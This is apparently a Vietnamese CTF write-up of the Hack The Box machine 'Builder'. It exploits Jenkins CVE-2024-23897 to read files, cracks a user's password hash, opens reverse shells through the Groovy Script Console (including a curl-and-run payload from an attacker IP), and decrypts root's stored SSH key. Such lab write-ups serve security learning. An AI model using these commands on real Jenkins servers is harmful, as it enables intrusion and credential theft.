<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="Hexo Theme Keep">
    <meta name="author" content="dcduc">
    
    <title>
        
            Machine: Builder |
        
        dcduc&#39;s blog
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
        <link rel="shortcut icon" href="/images/logo.jpg">
    
    
<link rel="stylesheet" href="/font/css/fontawesome.min.css">

    
<link rel="stylesheet" href="/font/css/regular.min.css">

    
<link rel="stylesheet" href="/font/css/solid.min.css">

    
<link rel="stylesheet" href="/font/css/brands.min.css">

    
        
            
        
            
                
<link rel="stylesheet" href="/css/custom-1.css">

            
        
    
    <script class="keep-theme-configurations">
    const KEEP = window.KEEP || {}
    KEEP.hexo_config = {"hostname":"example.com","root":"/","language":"en"}
    KEEP.theme_config = {"base_info":{"primary_color":"#0066cc","title":"dcduc's blog","author":"dcduc","avatar":"/images/avatar.jpg","logo":"/images/logo.jpg","favicon":"/images/logo.jpg"},"menu":{"home":"/                       || fa-solid fa-home","archives":"/archives           || fa-solid fa-box-archive","me":{"icon":"fa-solid fa-book","children":[{"about":"/about                 || fa-solid fa-user-graduate"},{"tools":"/tools                 || fa-solid fa-tools"}]}},"first_screen":{"enable":true,"background_img":"/images/rain.gif","background_img_dark":"/images/bg.gif","description":null,"hitokoto":false},"social_contact":{"enable":false,"links":{"github":null,"weixin":null,"qq":null,"weibo":null,"zhihu":null,"twitter":null,"x":null,"facebook":null,"email":null}},"scroll":{"progress_bar":true,"percent":true,"hide_header":true},"home":{"announcement":null,"category":false,"tag":false,"post_datetime":"updated"},"post":{"author_badge":{"enable":false,"level_badge":true,"custom_badge":["One","Two","Three"]},"word_count":{"wordcount":true,"min2read":true},"datetime_format":"YYYY-MM-DD HH:mm:ss","copyright_info":false,"share":false,"reward":{"enable":false,"img_link":null,"text":null,"icon":null}},"code_block":{"tools":{"enable":true,"style":"mac"},"highlight_theme":"obsidian"},"toc":{"enable":true,"number":true,"expand_all":false,"init_open":true,"layout":"right"},"website_count":{"busuanzi_count":{"enable":true,"site_uv":true,"site_pv":true,"page_pv":true}},"local_search":{"enable":true,"preload":true},"comment":{"enable":false,"use":"valine","valine":{"appid":null,"appkey":null,"server_urls":null,"placeholder":null},"gitalk":{"github_id":null,"github_admins":null,"repository":null,"client_id":null,"client_secret":null,"proxy":null},"twikoo":{"env_id":null,"region":null,"version":"1.6.36"},"waline":{"server_url":null,"reaction":false,"version":"3.2.1"},"giscus":{"repo":null,"repo_id":null,"category":"Announcements","category_id":null,"reactions_enabled":false},"artalk":{"server":null},"disqus":{"shortname":null}},"rss":{"enable":false},"lazyload":{"enable":false},"cdn":{"enable":false,"provider":"cdnjs"},"pjax":{"enable":true},"footer":{"since":2023,"word_count":true,"site_deploy":{"enable":false,"provider":"github","url":null},"record":{"enable":false,"list":[{"code":null,"link":null}]}},"inject":{"enable":true,"css":[null,"/css/custom-1.css"],"js":[null]},"root":"","source_data":{},"version":"4.2.3"}
    KEEP.language_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"}
    KEEP.language_code_block = {"copy":"Copy code","copied":"Copied","fold":"Fold code block","folded":"Folded"}
    KEEP.language_copy_copyright = {"copy":"Copy copyright info","copied":"Copied","title":"Original post title","author":"Original post author","link":"Original post link"}
  </script>
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
<div class="progress-bar-container">
    
        <span class="scroll-progress-bar"></span>
    

    
        <span class="pjax-progress-bar"></span>
        <i class="pjax-progress-icon fas fa-circle-notch fa-spin"></i>
    
</div>



<main class="page-container border-box">
    <!-- home first screen  -->
    

    <!-- page content -->
    <div class="page-main-content border-box">
        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="border-box header-content">
        <div class="left flex-start border-box">
            
                <a class="logo-image border-box" href="/">
                    <img src="/images/logo.jpg">
                </a>
            
            <a class="site-name border-box" href="/">
               dcduc&#39;s blog
            </a>
        </div>

        <div class="right border-box">
            <div class="pc border-box">
                <ul class="menu-list border-box">
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/">
                                
                                    <i class="menu-text-color menu-icon fa-solid fa-home"></i>
                                
                                HOME
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/archives">
                                
                                    <i class="menu-text-color menu-icon fa-solid fa-box-archive"></i>
                                
                                ARCHIVES
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box has-sub-menu">
                            <a class="menu-text-color border-box" href="javascript:void(0);">
                                
                                    <i class="menu-text-color menu-icon fa-solid fa-book"></i>
                                
                                ME
                                
                                    <i class="menu-text-color collapse-icon fa-solid fa-angle-down"></i>
                                
                            </a>
                            
                                <ul class="sub-menu-list border-box">
                                    
                                        
                                        <li class="sub-menu-item border-box ">
                                            <a class="menu-text-color border-box flex-start" href="/about">
                                                
                                                    <i class="menu-text-color sub-menu-icon fa-solid fa-user-graduate"></i>
                                                
                                                ABOUT
                                            </a>
                                        </li>
                                    
                                        
                                        <li class="sub-menu-item border-box ">
                                            <a class="menu-text-color border-box flex-start" href="/tools">
                                                
                                                    <i class="menu-text-color sub-menu-icon fa-solid fa-tools"></i>
                                                
                                                TOOLS
                                            </a>
                                        </li>
                                    
                                </ul>
                            
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="menu-text-color fas search fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile border-box flex-start">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list border-box">
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/">
                            
                                <span class="menu-icon-wrap border-box flex-center">
                                    <i class="drawer-menu-text-color menu-icon fa-solid fa-home"></i>
                                </span>
                            
                            HOME
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/archives">
                            
                                <span class="menu-icon-wrap border-box flex-center">
                                    <i class="drawer-menu-text-color menu-icon fa-solid fa-box-archive"></i>
                                </span>
                            
                            ARCHIVES
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box has-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="javascript:void(0);">
                            
                                <span class="menu-icon-wrap border-box flex-center">
                                    <i class="drawer-menu-text-color menu-icon fa-solid fa-book"></i>
                                </span>
                            
                            ME
                        </a>
                        
                            <i class="right-side collapse-icon fa-solid fa-angle-left"></i>
                        
                    </label>
                    
                        <ul class="drawer-sub-menu-list border-box">
                            
                                
                                <li class="sub-menu-item border-box">
                                    <a class="drawer-menu-text-color border-box flex-start" href="/about">
                                        
                                            <span class="sub-menu-icon-wrap border-box flex-center">
                                                <i class="drawer-menu-text-color sub-menu-icon fa-solid fa-user-graduate"></i>
                                            </span>
                                        
                                        ABOUT
                                    </a>
                                </li>
                            
                                
                                <li class="sub-menu-item border-box">
                                    <a class="drawer-menu-text-color border-box flex-start" href="/tools">
                                        
                                            <span class="sub-menu-icon-wrap border-box flex-center">
                                                <i class="drawer-menu-text-color sub-menu-icon fa-solid fa-tools"></i>
                                            </span>
                                        
                                        TOOLS
                                    </a>
                                </li>
                            
                        </ul>
                    
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle border-box">

            <div class="main-content border-box">
                

                    
<div class="fade-in-down-animation">
    <div class="post-page-container border-box">
        <div class="post-content-container border-box">
            

            <div class="post-content-bottom border-box">
                
                    <div class="post-title">
                        Machine: Builder
                    </div>
                

                
                    <div class="post-header border-box">
                        
                            <div class="avatar-box border-box">
                                <img src="/images/avatar.jpg">
                            </div>
                        
                        <div class="info-box">
                            <div class="author border-box">
                                <span class="name">dcduc</span>
                                
                            </div>
                            <div class="meta-info border-box">
                                

<div class="post-meta-info-container border-box post">
    <div class="post-meta-info border-box">
        

        
            <span class="meta-info-item post-create-date">
                <i class="icon fa-solid fa-calendar-plus"></i>&nbsp;
                <span class="datetime">2024-10-19 15:19:28</span>
            </span>

            <span class="meta-info-item post-update-date">
                <i class="icon fa-solid fa-file-pen"></i>&nbsp;
                <span class="datetime" data-updated="Tue Oct 29 2024 23:19:04 GMT+0700">2024-10-29 23:19:04</span>
            </span>
        

        

        
            <span class="post-tag meta-info-item border-box">
                <ul class="post-tag-ul">
                    
                            <li class="tag-item"><span class="tag-separator"><i class="icon fas fa-hashtag"></i></span><a href="/tags/htb/">htb</a></li>
                        
                    
                </ul>
            </span>
        

        
        
        
        
            <span class="meta-info-item post-pv">
                <i class="icon fas fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
            </span>
        
    </div>

    
</div>

                            </div>
                        </div>
                    </div>
                

                <div class="post-content keep-markdown-body ">
                    

                    
                         <h2 id="Machine-info"><a href="#Machine-info" class="headerlink" title="Machine info"></a>Machine info</h2><p><img   src="https://i.imgur.com/olCtw48.png"  alt="image.png"></p>
<h2 id="Get-started"><a href="#Get-started" class="headerlink" title="Get started"></a>Get started</h2><h3 id="Recon"><a href="#Recon" class="headerlink" title="Recon"></a>Recon</h3><ul>
<li>Scan các port đang mở</li>
</ul>
<p><img   src="https://i.imgur.com/f8gMNHs.png"  alt="image.png"></p>
<ul>
<li>Scan các service đang chạy tương ứng với các port</li>
</ul>
<p><img   src="https://i.imgur.com/iO1luhy.png"  alt="image.png"></p>
<ul>
<li><p>Dựa vào kết quả scan ta có thể thấy, machine này có 2 port đang mở gồm</p>
<ul>
<li>Port 22: SSH service</li>
<li>Port 8080: HTTP service sử dụng Eclipse Jetty 10.0.18 là một Java web server và web app đang chạy trên service này là Jenkins server.</li>
</ul>
<blockquote>
<ul>
<li>Jenkins là một ứng dụng web mã nguồn mở được viết bằng Java, đóng vai trò máy chủ build &amp; test của hệ thống tích hợp liên tục (CI). Jenkins có thể kết hợp được với hầu hết các công cụ khác của hệ thống tích hợp liên tục với nhiều nền tảng khác nhau. Ngoài ra, cộng đồng sử dụng Jenkins rất lớn nên cũng rất dễ trong việc sử dụng và hỗ trợ khi gặp khó khăn.</li>
<li>Continuous Integration (CI) là quá trình tích hợp mã nguồn từ nhiều nhà phát triển vào một kho lưu trữ chung hàng ngày. Sau đó, hệ thống tự động xây dựng, kiểm thử và kiểm tra tích hợp. Mục tiêu của CI là giảm thiểu xung đột và lỗi hệ thống đo tích hợp mã nguồn.</li>
</ul>
</blockquote>
</li>
<li><p>Truy cập vào trang web ta vào được dashboard của Jenkins ở trạng thái chưa login.</p>
</li>
</ul>
<p><img   src="https://i.imgur.com/frlnLSc.png"  alt="image.png"></p>
<ul>
<li>Để ý thấy phiên bản của Jenkins ở dưới góc màn hình. Google thử thì thấy được phiên bản này có 1 CVE về <strong>arbitrary file read</strong> thông qua <strong>Jenkins CLI</strong> - giao diện dòng lệnh (CLI) được tích hợp để truy cập Jenkins từ môi trường script hoặc shell.</li>
</ul>
<p><img   src="https://i.imgur.com/knBMe2w.png"  alt="image.png"></p>
<h3 id="CVE-2024-23897"><a href="#CVE-2024-23897" class="headerlink" title="CVE-2024-23897"></a>CVE-2024-23897</h3><blockquote>
<p>CVE-2024-23897​: Jenkins uses the <a class="link"   target="_blank" rel="noopener" href="https://github.com/kohsuke/args4j" >args4j library<i class="fas fa-external-link-alt"></i></a> to parse command arguments and options on the Jenkins controller when processing CLI commands. This command parser has a feature that replaces an <code>@</code> character followed by a file path in an argument with the file’s contents (<code>expandAtFiles</code>). This feature is enabled by default and Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable it.</p>
</blockquote>
<ul>
<li>Download <strong>Jenkins-CLI</strong> về để test.</li>
</ul>
<p><img   src="https://i.imgur.com/RNiryVi.png"  alt="image.png"></p>
<p><img   src="https://i.imgur.com/33ZxmpP.png"  alt="image.png"></p>
<ul>
<li>Tuy nhiên khi đọc file <strong>&#x2F;etc&#x2F;password</strong> chỉ trả về 1 dòng duy nhất. Đọc trên trang chủ thì biết được số dòng đọc được sẽ phụ thuộc vào CLI command.</li>
</ul>
<p><img   src="https://i.imgur.com/gxb4WyN.png"  alt="image.png"></p>
<ul>
<li>Viết 1 bash script ngắn để check command trả về output dài nhất</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">java -jar jenkins-cli.jar -s http://10.10.11.10:8080 <span class="built_in">help</span> 2&gt;&amp;1 | awk <span class="string">&#x27;&#123;if(NR%2==1) print $1&#125;&#x27;</span> | <span class="keyword">while</span> <span class="built_in">read</span> -r cmd; <span class="keyword">do</span></span><br><span class="line">	lc=$(/bin/sh -c <span class="string">&quot;java -jar jenkins-cli.jar -s http://10.10.11.10:8080 <span class="variable">$cmd</span> &#x27;@/etc/passwd&#x27; 2&gt;&amp;1 &amp;&quot;</span> | <span class="built_in">wc</span> -l)</span><br><span class="line">	<span class="built_in">printf</span> <span class="string">&quot;%s\t\t%s\n&quot;</span> <span class="string">&quot;<span class="variable">$cmd</span>&quot;</span> <span class="string">&quot;<span class="variable">$lc</span>&quot;</span> | awk <span class="string">&#x27;&#123;$1 = sprintf(&quot;%-30s&quot;, $1)&#125; 1&#x27;</span></span><br><span class="line"><span class="keyword">done</span></span><br></pre></td></tr></table></figure>

<ul>
<li>Vậy ta sẽ dùng command <code>connect-node</code> để khai thác.</li>
</ul>
<p><img   src="https://i.imgur.com/lR5dpI1.png"  alt="image.png"></p>
<p><img   src="https://i.imgur.com/HnziU5N.png"  alt="image.png"></p>
<blockquote>
<p>Follow theo mô tả của bài lab giờ ta cần extract username và password hash của Jenkins user <code>jennifer</code>. &rarr; Cần tìm file chứa thông tin native user.</p>
</blockquote>
<h4 id="Setup"><a href="#Setup" class="headerlink" title="Setup"></a>Setup</h4><ul>
<li>Trước tiên cần pull docker jenkins về chạy để xem structure bên trong server.</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">docker pull jenkins/jenkins</span><br><span class="line">docker run --<span class="built_in">rm</span> jenkins/jenkins</span><br></pre></td></tr></table></figure>

<ul>
<li>Dùng password được generate ở trong log để truy cập vào dashboard.</li>
</ul>
<p><img   src="https://i.imgur.com/b5ItMQx.png"  alt="image.png"></p>
<ul>
<li>Để ý thấy password của admin cũng sẽ được lưu ở <code>/var/jenkins_home/secrets/initialAdminPassword</code>, thử đọc file này nhưng kết quả trả về</li>
</ul>
<p><img   src="https://i.imgur.com/OaOGWom.png"  alt="image.png"></p>
<ul>
<li>Tiếp tục setup</li>
</ul>
<p><img   src="https://i.imgur.com/ZZR62aV.png"  alt="image.png"></p>
<ul>
<li>Đăng ký một admin user</li>
</ul>
<p><img   src="https://i.imgur.com/fcXcrds.png"  alt="image.png"></p>
<ul>
<li>Setup hoàn tất. Tiếp theo cần đọc về directory structure of the <code>JENKINS_HOME</code> tree trong Jenkins server để tiện vọc vạch.</li>
</ul>
<h4 id="Enumeration"><a href="#Enumeration" class="headerlink" title="Enumeration"></a>Enumeration</h4><ul>
<li>Khả năng cao password hash của user được lưu ở đây</li>
</ul>
<p><img   src="https://i.imgur.com/qXh6mpl.png"  alt="image.png"></p>
<ul>
<li>Trước tiên cần tìm được <code>JENKINS_HOME</code></li>
</ul>
<p><img   src="https://i.imgur.com/JMzz6QF.png"  alt="image.png"></p>
<ul>
<li>Trong Jenkins thông tin về native user account sẽ được lưu trong folder có tên trùng với username + chuỗi số ngẫu nhiên. Và file <code>users.xml</code> sẽ chứa thông tin về các users này</li>
</ul>
<p><img   src="https://i.imgur.com/BylHr6n.png"  alt="image.png"></p>
<p><img   src="https://i.imgur.com/zInF8Ji.png"  alt="image.png"></p>
<ul>
<li>Ngoài ra ở file <code>config.xml</code> trong user folder cũng sẽ chứa hash password của user tương ứng.</li>
</ul>
<p><img   src="https://i.imgur.com/Z8McpOT.png"  alt="image.png"></p>
<ul>
<li>Dùng <code>hashcat</code> để kiểm tra thuật toán sử dụng</li>
</ul>
<p><img   src="https://i.imgur.com/hnFa5WN.png"  alt="image.png"></p>
<h3 id="Grab-username-and-password-hash"><a href="#Grab-username-and-password-hash" class="headerlink" title="Grab username and password hash"></a>Grab username and password hash</h3><ul>
<li>Tiếp theo test trên server, tìm được user folder name</li>
</ul>
<p><img   src="https://i.imgur.com/swtbRPv.png"  alt="image.png"></p>
<ul>
<li>Dump nội dung trong file <code>/var/jenkins_home/users/jennifer_12108429903186576833/config.xml</code> rồi thử crack password với wordlist <code>rockyou.txt</code></li>
</ul>
<p><img   src="https://i.imgur.com/laUWH8f.png"  alt="image.png"></p>
<ul>
<li>Vậy ta có được username <code>jennifer</code> và password <code>princess</code></li>
</ul>
<h3 id="User-flag"><a href="#User-flag" class="headerlink" title="User flag"></a>User flag</h3><ul>
<li>Đăng nhập với account tìm được ở trên</li>
</ul>
<p><img   src="https://i.imgur.com/4lwy4sv.png"  alt="image.png"></p>
<ul>
<li>Khi đã có một valid account thì sau đó ta có nhiều thứ có thể khai thác. Target trước mắt cần RCE để lấy User flag. Dễ nhất thì sẽ sử dụng Groovy Script thông qua Jenkins Tool là Script Console.</li>
</ul>
<p><img   src="https://i.imgur.com/2Cpt3yl.png"  alt="image.png"></p>
<ul>
<li>Thử reverse shell bằng payload <code>bash -i &gt;&amp; /dev/tcp/10.10.14.29/1337 0&gt;&amp;1</code> nhưng không thành công. Nên mình thử base64 encode để chuỗi chỉ gồm chữ và số.</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> -n <span class="string">&#x27;bash -i  &gt;&amp; /dev/tcp/10.10.14.8/9001  0&gt;&amp;1   &#x27;</span> | <span class="built_in">base64</span> -w 0</span><br><span class="line"><span class="built_in">echo</span> YmFzaCAtaSAgPiYgL2Rldi90Y3AvMTAuMTAuMTQuOC85MDAxICAwPiYxICAg | <span class="built_in">base64</span> -d | bash</span><br></pre></td></tr></table></figure>

<p><img   src="https://i.imgur.com/mp9e0OF.png"  alt="image.png"></p>
<ul>
<li>Có vẻ nó không nhận pipeline. Thử setup một server chứa file payload reserve shell.</li>
</ul>
<figure class="highlight groovy"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&quot;curl -o /tmp/tmp.sh http://10.10.14.29:8888/tmp.sh &amp;&amp; bash /tmp/tmp.sh&#x27;&quot;</span>.execute().text</span><br></pre></td></tr></table></figure>

<ul>
<li>User flag</li>
</ul>
<p><img   src="https://i.imgur.com/FvQduA5.png"  alt="image.png"></p>
<h3 id="Root-flag"><a href="#Root-flag" class="headerlink" title="Root flag"></a>Root flag</h3><ul>
<li>Với root flag, machine có gợi ý sử dụng SSH key để access root. Nên khả năng sẽ tìm SSH key của user root và từ đó có thể đăng nhập vào root user.</li>
</ul>
<p><img   src="https://i.imgur.com/GPfWvSk.png"  alt="image.png"></p>
<ul>
<li>Đọc thử file <code>credentials.xml</code> thì thấy được private key của user root đã được mã hoá (có vẻ dùng base64).</li>
</ul>
<p><img   src="https://i.imgur.com/qNhvQSQ.png"  alt="image.png"></p>
<ul>
<li>Để decrypt key này thì ta cũng có 2 cách, vì đã access được Script Console nên sử dụng Groovy để decrypt luôn.</li>
</ul>
<p><img   src="https://i.imgur.com/2ZJ2tP8.png"  alt="image.png"></p>
<p><img   src="https://i.imgur.com/BxmJjip.png"  alt="image.png"></p>
<ul>
<li>Sử dụng key để SSH và ta có root</li>
</ul>
<p><img   src="https://i.imgur.com/mhb9shr.png"  alt="image.png"></p>
<ul>
<li>Root flag</li>
</ul>
<p><img   src="https://i.imgur.com/5EnV9NN.png"  alt="image.png"></p>
<h3 id="Other-solution"><a href="#Other-solution" class="headerlink" title="Other solution"></a>Other solution</h3><ul>
<li>Đầu tiên khi đã có valid account access Jenkins server thì ngoài Groovy Script thì cũng còn những cách dưới đây</li>
</ul>
<p><img   src="https://i.imgur.com/zXpWcyK.png"  alt="image.png"></p>
<ul>
<li>Ngoài việc đọc secret key ở <code>credential.xml</code> thì ở chức năng update credential thì private key cũng được hidden ở DOM của web page.</li>
</ul>
<p><img   src="https://i.imgur.com/Y5vW2ig.png"  alt="image.png"></p>
<ul>
<li>Để đọc được SSH key của root cũng có thể sử dụng <strong>Pipeline script</strong>.</li>
</ul>
<h2 id="References"><a href="#References" class="headerlink" title="References"></a>References</h2><p>[1] <a class="link"   target="_blank" rel="noopener" href="https://jenkins-le-guide-complet.github.io/html/sec-hudson-home-directory-contents.html#:~:text=The%20Jenkins%20home%20directory%20contains,xml%20file." >What&#39;s in the Jenkins Home Directory<i class="fas fa-external-link-alt"></i></a><br>[2] <a class="link"   target="_blank" rel="noopener" href="https://www.jenkins.io/doc/book/managing/system-configuration/" >Configuring the Jenkins System<i class="fas fa-external-link-alt"></i></a><br>[3] <a class="link"   target="_blank" rel="noopener" href="https://whitehat.vn/threads/trien-khai-poc-validating-jenkins-cho-lo-hong-cve-2024-23897.17831/" >Triển khai PoC Validating Jenkins cho lỗ hổng CVE-2024-23897<i class="fas fa-external-link-alt"></i></a><br>[4] <a class="link"   target="_blank" rel="noopener" href="https://cloud.hacktricks.xyz/pentesting-ci-cd/jenkins-security" >Jenkins Security<i class="fas fa-external-link-alt"></i></a><br>[5] <a class="link"   target="_blank" rel="noopener" href="https://www.jenkins.io/doc/book/managing/cli/" >Jenkins CLI<i class="fas fa-external-link-alt"></i></a><br>[6] <a class="link"   target="_blank" rel="noopener" href="https://cloud.hacktricks.xyz/pentesting-ci-cd/jenkins-security#internal-jenkins-abuses" >Internal Jenkins Abuses<i class="fas fa-external-link-alt"></i></a><br>[7] <a class="link"   target="_blank" rel="noopener" href="https://viblo.asia/p/jenkins-pipeline-for-beginners-Qbq5QgJJZD8" >Jenkins Pipeline for beginners<i class="fas fa-external-link-alt"></i></a></p>

                    
                </div>

                

                <div class="post-bottom-tags-and-share border-box">
                    <div>
                        
                            <ul class="post-tags-box border-box">
                                
                                    <li class="tag-item border-box">
                                        <i class="icon fas fa-hashtag"></i>&nbsp;<a href="/tags/htb/">htb</a>
                                    </li>
                                
                            </ul>
                        
                    </div>
                    <div>
                        
                    </div>
                </div>

                

                
                    <div class="post-nav border-box">
                        
                            <div class="prev-post">
                                <a class="prev"
                                   rel="prev"
                                   href="/2024/10/29/htb-machine-sau/"
                                   title="Machine: Sau"
                                >
                                    <span class="left arrow-icon flex-center">
                                        <i class="fas fa-chevron-left"></i>
                                    </span>
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">Machine: Sau</span>
                                        <span class="post-nav-item">Prev posts</span>
                                    </span>
                                </a>
                            </div>
                        
                        
                    </div>
                

                
                    






                
            </div>
        </div>

        
            <div class="pc-post-toc right-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Machine-info"><span class="nav-number">1.</span> <span class="nav-text">Machine info</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Get-started"><span class="nav-number">2.</span> <span class="nav-text">Get started</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Recon"><span class="nav-number">2.1.</span> <span class="nav-text">Recon</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#CVE-2024-23897"><span class="nav-number">2.2.</span> <span class="nav-text">CVE-2024-23897</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Setup"><span class="nav-number">2.2.1.</span> <span class="nav-text">Setup</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Enumeration"><span class="nav-number">2.2.2.</span> <span class="nav-text">Enumeration</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Grab-username-and-password-hash"><span class="nav-number">2.3.</span> <span class="nav-text">Grab username and password hash</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#User-flag"><span class="nav-number">2.4.</span> <span class="nav-text">User flag</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Root-flag"><span class="nav-number">2.5.</span> <span class="nav-text">Root flag</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Other-solution"><span class="nav-number">2.6.</span> <span class="nav-text">Other solution</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#References"><span class="nav-number">3.</span> <span class="nav-text">References</span></a></li></ol>
    </div>
</div>

            </div>
        
    </div>
</div>


                
            </div>
        </div>

        <div class="page-main-content-bottom border-box">
            
<footer class="footer border-box">
    <div class="copyright-info info-item">
        &copy;&nbsp;<span>2023</span>&nbsp;-&nbsp;2024
        
            &nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;&nbsp;<a href="/">dcduc</a>
        
    </div>

    <div class="theme-info info-item">
        Powered by&nbsp;<a target="_blank" href="https://hexo.io">Hexo</a>&nbsp;&&nbsp;Theme&nbsp;<a class="keep-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep</a>
    </div>

    

    
        <div class="count-info info-item">
            

            
                <span class="count-item border-box uv">
                    <span class="item-type border-box">Unique Visitor</span>
                    <span class="item-value border-box uv" id="busuanzi_value_site_uv"></span>
                </span>
            

            
                <span class="count-item border-box pv">
                    <span class="item-type border-box">Page View</span>
                    <span class="item-value border-box pv" id="busuanzi_value_site_pv"></span>
                </span>
            
        </div>
    

    
</footer>

        </div>
    </div>

    <!-- post tools -->
    
        <div class="post-tools right-toc">
            <div class="post-tools-container border-box">
    <ul class="post-tools-list border-box">
        <!-- PC encrypt again -->
        

        <!-- PC TOC show toggle -->
        
            <li class="tools-item flex-center toggle-show-toc">
                <i class="fas fa-list"></i>
            </li>
        

        <!-- PC go comment -->
        

        <!-- PC full screen -->
        <li class="tools-item flex-center full-screen">
            <i class="fa-solid fa-expand"></i>
        </li>
    </ul>
</div>

        </div>
    

    <!-- side tools -->
    <div class="side-tools">
        <div class="side-tools-container border-box ">
    <ul class="side-tools-list side-tools-show-handle border-box">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <!-- toggle mode -->
        
            <li class="tools-item tool-toggle-theme-mode flex-center">
                <i class="fas fa-moon"></i>
            </li>
        

        <!-- rss -->
        

        <!-- to bottom -->
        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list border-box">
        
            <li class="tools-item toggle-show-toc-tablet flex-center">
                <i class="fas fa-list"></i>
            </li>
        

        

        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>

        <li class="tools-item tool-scroll-to-top flex-center show-arrow">
            <i class="arrow fas fa-arrow-up"></i>
            <span class="percent"></span>
        </li>
    </ul>
</div>

    </div>

    <!-- image mask -->
    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    <!-- local search -->
    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="Search..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="close-popup-btn">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

    <!-- tablet toc -->
    
        <div class="tablet-post-toc-mask">
            <div class="tablet-post-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Machine-info"><span class="nav-number">1.</span> <span class="nav-text">Machine info</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Get-started"><span class="nav-number">2.</span> <span class="nav-text">Get started</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Recon"><span class="nav-number">2.1.</span> <span class="nav-text">Recon</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#CVE-2024-23897"><span class="nav-number">2.2.</span> <span class="nav-text">CVE-2024-23897</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Setup"><span class="nav-number">2.2.1.</span> <span class="nav-text">Setup</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Enumeration"><span class="nav-number">2.2.2.</span> <span class="nav-text">Enumeration</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Grab-username-and-password-hash"><span class="nav-number">2.3.</span> <span class="nav-text">Grab username and password hash</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#User-flag"><span class="nav-number">2.4.</span> <span class="nav-text">User flag</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Root-flag"><span class="nav-number">2.5.</span> <span 